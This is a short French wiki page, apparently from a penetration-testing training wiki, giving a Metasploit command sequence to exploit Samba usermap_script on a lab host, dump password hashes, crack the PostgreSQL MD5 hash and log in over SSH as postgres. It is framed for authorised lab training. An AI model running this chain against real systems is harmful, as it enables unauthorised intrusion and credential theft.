Postgre password metasploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Post-exploitation Linux
Objectif Récupérer et casser un hash PostgreSQL
Vecteur Samba usermap_script
Voir aussi Postgres login · Postgres metasploit

Enchaînement : obtenir un shell via la faille Samba usermap_script, récupérer les hashs locaux, puis casser le hash MD5 PostgreSQL pour se connecter en SSH avec le compte postgres.

Obtenir une session

msfconsole
use exploit/multi/samba/usermap_script
set RHOST 192.168.0.196
exploit
sessions

Récupérer les hashs

use post/linux/gather/hashdump
show options
set SESSION 1
exploit

Casser le hash MD5 PostgreSQL

use auxiliary/analyze/postgres_md5_crack
show options
exploit

Puis connexion avec le compte récupéré :

ssh postgres@192.168.0.x

Voir aussi